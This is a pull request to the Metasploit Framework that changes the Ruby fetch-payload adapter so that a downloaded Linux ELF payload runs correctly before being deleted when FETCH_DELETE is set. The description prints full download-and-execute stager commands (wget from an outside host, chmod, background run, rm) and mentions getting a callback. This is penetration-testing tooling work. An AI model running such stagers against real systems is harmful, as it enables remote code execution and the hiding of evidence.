### PR TITLE
Fix bug in the way we are executing fetch payload when FETCH_DELETE is true

### DIFF
--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -203,14 +203,8 @@ module Msf::Payload::Adapter::Fetch
 
   def _execute_nix
     cmds = ";chmod +x #{_remote_destination_nix}"
-    if datastore['FETCH_DELETE']
-      # sometimes the delete can happen before the process is created
-      sleep_delete = rand(2..7)
-      cmds << ";(#{_remote_destination_nix} &)"
-      cmds << ";sleep #{sleep_delete};rm -rf #{_remote_destination_nix}"
-    else
-      cmds << ";#{_remote_destination_nix} &"
-    end
+    cmds << ";#{_remote_destination_nix}&"
+    cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
     cmds
   end
 

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -202,12 +202,14 @@ module Msf::Payload::Adapter::Fetch
   end
 
   def _execute_nix
-    cmds = "; chmod +x #{_remote_destination_nix}"
+    cmds = ";chmod +x #{_remote_destination_nix}"
     if datastore['FETCH_DELETE']
-      cmds << "; (#{_remote_destination_nix} &)"
-      cmds << ";rm -rf #{_remote_destination_nix}"
+      # sometimes the delete can happen before the process is created
+      sleep_delete = rand(2..7)
+      cmds << ";(#{_remote_destination_nix} &)"
+      cmds << ";sleep #{sleep_delete};rm -rf #{_remote_destination_nix}"
     else
-      cmds << "; #{_remote_destination_nix} &"
+      cmds << ";#{_remote_destination_nix} &"
     end
     cmds
   end

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -203,8 +203,12 @@ module Msf::Payload::Adapter::Fetch
 
   def _execute_nix
     cmds = "; chmod +x #{_remote_destination_nix}"
-    cmds << "; #{_remote_destination_nix} &"
-    cmds << ";rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
+    if datastore['FETCH_DELETE']
+      cmds << "; (#{_remote_destination_nix} &)"
+      cmds << ";rm -rf #{_remote_destination_nix}"
+    else
+      cmds << "; #{_remote_destination_nix} &"
+    end
     cmds
   end
 


### PR DESCRIPTION
This change fixes a bug in the way we execute the payload elf inside fetch command payloads when the FETCH_DELETE value is set to true.  @h00die-gr3y did a great job explaining everything in the issue, and then solving it.
Fixes https://github.com/rapid7/metasploit-framework/issues/19391

### Old and Busted
```
msfuser@ubuntu2004-vm:~$ wget -qO /tmp/uDhlPVBiInV http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/uDhlPVBiInV; /tmp/uDhlPVBiInV &;rm -rf /tmp/uDhlPVBiInV
-bash: syntax error near unexpected token `;'
```

### New and Improved
```
msfuser@ubuntu2004-vm:~$ wget -qO /tmp/uDhlPVBiInV http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/uDhlPVBiInV; (/tmp/uDhlPVBiInV &);rm -rf /tmp/uDhlPVBiInV
```


### Verification:
- [ ] Generate a Linux fetch payload with FETCH_DELETE set to true.
- [ ] Verify the payload elf is executed within a parenthetical i.e. `(...)`
- [ ] Verify you get the callback

Thanks, @h00die-gr3y!